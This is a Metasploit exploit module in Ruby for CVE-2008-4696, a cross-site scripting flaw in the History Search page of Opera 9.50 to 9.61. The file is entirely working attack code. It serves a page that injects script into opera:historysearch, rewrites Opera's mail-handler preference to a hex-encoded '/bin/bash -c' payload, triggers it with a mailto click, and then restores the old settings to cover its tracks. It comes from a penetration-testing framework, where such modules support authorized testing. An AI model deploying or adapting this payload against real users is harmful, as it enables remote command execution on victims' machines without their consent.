1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpServer::HTML
10

11
  # include Msf::Exploit::Remote::BrowserAutopwn
12
  # autopwn_info({
13
  #  :ua_name    => HttpClients::OPERA,
14
  #  :javascript => true,
15
  #  :rank       => ExcellentRanking, # reliable command execution
16
  #  :vuln_test  => %Q{
17
  #    v = parseFloat(opera.version());
18
  #    if (9.5 < v && 9.62 > v) {
19
  #      is_vuln = true;
20
  #    }
21
  #  },
22
  # })
23

24
  def initialize(info = {})
25
    super(
26
      update_info(
27
        info,
28
        'Name' => 'Opera historysearch XSS',
29
        'Description' => %q{
30
          Certain constructs are not escaped correctly by Opera's History
31
          Search results.  These can be used to inject scripts into the
32
          page, which can then be used to modify configuration settings
33
          and execute arbitrary commands.  Affects Opera versions between
34
          9.50 and 9.61.
35
        },
36
        'License' => BSD_LICENSE,
37
        'Author' => [
38
          'Roberto Suggi', # Discovered the vulnerability
39
          'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec
40
          'egypt', # msf module
41
        ],
42
        'References' => [
43
          ['CVE', '2008-4696'],
44
          ['OSVDB', '49472'],
45
          ['BID', '31869'],
46
          ['URL', 'http://www.opera.com/support/kb/view/903/'],
47
        ],
48
        'Payload' => {
49
          'EXITFUNC' => 'process',
50
          'Space' => 4000,
51
          'DisableNops' => true,
52
          'BadChars' => "\x09\x0a\x0d\x20",
53
          'Compat' =>
54
              {
55
                'PayloadType' => 'cmd',
56
                'RequiredCmd' => 'generic perl ruby telnet',
57
              }
58
        },
59
        'Platform' => %w{unix},
60
        'Targets' => [
61
          # [ 'Automatic', {  } ],
62
          # [ 'Opera < 9.61 Windows',
63
          #	{
64
          #		'Platform' => 'win',
65
          #		'Arch' => ARCH_X86,
66
          #	}
67
          # ],
68
          [
69
            'Opera < 9.61 Unix Cmd',
70
            {
71
              'Platform' => 'unix',
72
              'Arch' => ARCH_CMD,
73
            }
74
          ],
75
        ],
76
        'DisclosureDate' => '2008-10-23', # Date of full-disclosure post showing code exec
77
        'DefaultTarget' => 0,
78
        'Notes' => {
79
          'Reliability' => UNKNOWN_RELIABILITY,
80
          'Stability' => UNKNOWN_STABILITY,
81
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
82
        }
83
      )
84
    )
85
  end
86

87
  def on_request_uri(cli, request)
88
    headers = {}
89
    html_hdr = %Q^
90
      <html>
91
      <head>
92
      <title>Loading</title>
93
      ^
94
    html_ftr = %Q^
95
      </head>
96
      <body >
97
      <h1>Loading</h1>
98
      </body></html>
99
      ^
100

101
    case request.uri
102
    when /[?]jspayload/
103
      p = regenerate_payload(cli)
104
      if (p.nil?)
105
        send_not_found(cli)
106
        return
107
      end
108
      # We're going to run this through unescape(), so make sure
109
      # everything is encoded
110
      penc = Rex::Text.to_hex(p.encoded, "%")
111
      content =
112
        %Q{
113
          var s = document.createElement("iframe");
114

115
          s.src="opera:config";
116
          s.id="config_window";
117
          document.body.appendChild(s);
118
          config_window.eval(
119
            "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
120
            "old_app = opera.getPreference('Mail','External Application');" +
121
            "old_handler = opera.getPreference('Mail','Handler');" +
122
            "opera.setPreference('Mail','External Application',cmd);" +
123
            "opera.setPreference('Mail','Handler','2');" +
124
            "app_link = document.createElement('a');" +
125
            "app_link.setAttribute('href', 'mailto:[email protected]');" +
126
            "app_link.click();" +
127
            "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
128
            "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
129
          "");
130
          setTimeout(function () {window.location='about:blank'},1);
131
        }
132

133
    when /[?]history/
134
      js = %Q^
135
        window.onload = function() {
136
          location.href = "opera:historysearch?q=*";
137
        }
138
        ^
139
      content = %Q^
140
        #{html_hdr}
141
        <script><!--
142
        #{js}
143
        //--></script>
144
        #{html_ftr}
145
        ^
146
    when get_resource()
147
      print_status("Sending #{self.name} for request #{request.uri}")
148

149
      js = %Q^
150
        if (window.opera) {
151
          var wnd = window;
152
          while (wnd.parent != wnd) {
153
            wnd = wnd.parent;
154
          }
155
          url = location.href;
156
          wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
157
        }
158
        ^
159
      content = %Q^
160
        #{html_hdr}
161
        <script><!--
162
        #{js}
163
        //--></script>
164
        #{html_ftr}
165
        ^
166
    else
167
      print_status("Sending 404 for request #{request.uri}")
168
      send_not_found(cli)
169
      return
170
    end
171
    content.gsub!(/^ {8}/, '')
172
    content.gsub!(/\t/, ' ')
173

174
    send_response_html(cli, content, headers)
175
    handler(cli)
176
  end
177
end
178

179